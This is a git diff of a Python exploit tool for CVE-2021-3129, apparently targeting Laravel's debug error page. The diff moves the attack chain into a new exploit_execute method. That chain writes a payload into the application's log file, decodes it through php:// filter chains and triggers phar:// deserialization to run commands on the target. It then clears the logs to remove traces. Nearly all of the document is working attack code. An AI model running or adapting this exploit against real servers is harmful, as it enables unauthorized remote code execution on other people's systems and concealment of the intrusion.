diff --git a/CVE-2021-3129.py b/CVE-2021-3129.py index ea9d13f..d274905 100644 --- a/CVE-2021-3129.py +++ b/CVE-2021-3129.py @@ -110,53 +110,7 @@ def cmd_execute_cmd(self, cmd): i = i+1 print(f"{PURPLE}[@] Trying chain {payload['name']} [{i}/{len(payloads)}]...") - print(BLUE + "[@] Clearing logs...") # Step 1. Clear logs to prevent old payloads executing. - self.exploit_clear_logs() - - print(BLUE + "[@] Causing error in logs...") # Step 2. Cause a error to write phar file. - if self.exploit_cause_error().status_code != 500: - print(RED + "[!] Failed causing error.") - self.exploit_clear_logs() - else: - print(GREEN + "[โˆš] Caused error in logs.") - - print(BLUE + "[@] Sending payloads...") - - if self.exploit_request(payload['data'], - 500).status_code != 500: # Step 3. Cause error with payload so payload in log file. - print(RED + "[!] Failed sending payload.") - self.exploit_clear_logs() - else: - print(GREEN + "[โˆš] Sent payload.") - - print(BLUE + "[@] Converting payload...") # Step 4. Change te log file into the payload in the log file. - if (self.exploit_request( - f"php://filter/read=convert.quoted-printable-decode|" - f"convert.iconv.utf-16le.utf-8|" - f"convert.base64-decode/resource={self.log_path}", - 200).status_code != 200): - print(RED + "[!] Failed converting payload.") - self.exploit_clear_logs() - else: - print(GREEN + "[โˆš] Converted payload.") - - exploited = self.exploit_request(f"phar://{self.log_path}", 500) # Step 5. Let host execute phar script. - if exploited.status_code == 500 and "cannot be empty" in exploited.text: - print(GREEN + "[โˆš] Result:") - result = exploited.text.split("")[1] - print(END + result) - - print(BLUE + "[@] Clearing logs...") # Step 6. Remove logs so phar is not downloadable/executable. - else: - error_search = r"๐Ÿงจ (.*?)<\/title>" - error_result = re.search(error_search, exploited.text) - if error_result: - print(RED + f"[!] Failed execution of payload.\nError: \"{error_result[1]}\".") - else: - print(RED + "[!] Failed execution of payload.") - - self.exploit_clear_logs() - self.exploit_clear_logs() + self.exploit_execute(payload['data']) if i < len(payloads): next_chain = input(PURPLE + "[?] Do you want to try the next chain? [Y/N] : ") @@ -165,7 +119,6 @@ def cmd_execute_cmd(self, cmd): else: break - def cmd_execute_write(self, text): print(DARKCYAN + f"[@] Writing to log file: \"{text}\"...") payload = self.generate_write_payload(text, 16) @@ -202,6 +155,60 @@ def exploit_clear_logs(self) -> requests.Response: # Clear entire log file def exploit_cause_error(self) -> requests.Response: # Cause error by sending path parameter return self.exploit_request("AA", 500) + def exploit_execute(self, payload): + success = True + print(BLUE + "[@] Clearing logs...") # Step 1. Clear logs to prevent old payloads executing. + self.exploit_clear_logs() + + print(BLUE + "[@] Causing error in logs...") # Step 2. Cause a error to write phar file. + if self.exploit_cause_error().status_code != 500: + print(RED + "[!] Failed causing error.") + self.exploit_clear_logs() + success = False + else: + print(GREEN + "[โˆš] Caused error in logs.") + + print(BLUE + "[@] Sending payloads...") + + if self.exploit_request(payload, 500).status_code != 500: # Step 3. Cause error with payload so payload in log file. + print(RED + "[!] Failed sending payload.") + self.exploit_clear_logs() + success = False + else: + print(GREEN + "[โˆš] Sent payload.") + + print(BLUE + "[@] Converting payload...") # Step 4. Change te log file into the payload in the log file. + if (self.exploit_request( + f"php://filter/read=convert.quoted-printable-decode|" + f"convert.iconv.utf-16le.utf-8|" + f"convert.base64-decode/resource={self.log_path}", + 200).status_code != 200): + print(RED + "[!] Failed converting payload.") + self.exploit_clear_logs() + success = False + else: + print(GREEN + "[โˆš] Converted payload.") + + exploited = self.exploit_request(f"phar://{self.log_path}", 500) # Step 5. Let host execute phar script. + if exploited.status_code == 500 and "cannot be empty" in exploited.text: + print(GREEN + "[โˆš] Result:") + result = exploited.text.split("</html>")[1] + print(END + result) + else: + error_search = r"<title>๐Ÿงจ (.*?)<\/title>" + error_result = re.search(error_search, exploited.text) + if error_result: + print(RED + f"[!] Failed execution of payload.\nError: \"{error_result[1]}\".") + success = False + else: + print(RED + "[!] Failed execution of payload.") + success = False + + self.exploit_clear_logs() + self.exploit_clear_logs() + + return success + def random_useragent(self) -> str: # Get random user agent from constant list return random.choice(USER_AGENTS) @@ -410,7 +417,7 @@ def find_laravel_version(self, content: str): def validate_url(url: str) -> bool: # https://stackoverflow.com/a/7160778 regex = re.compile( - r'^(?:http|ftp)s?://' # http:// or https:// + r'^(?:http)s?://' # http:// or https:// r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain... r'localhost|' # localhost... r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip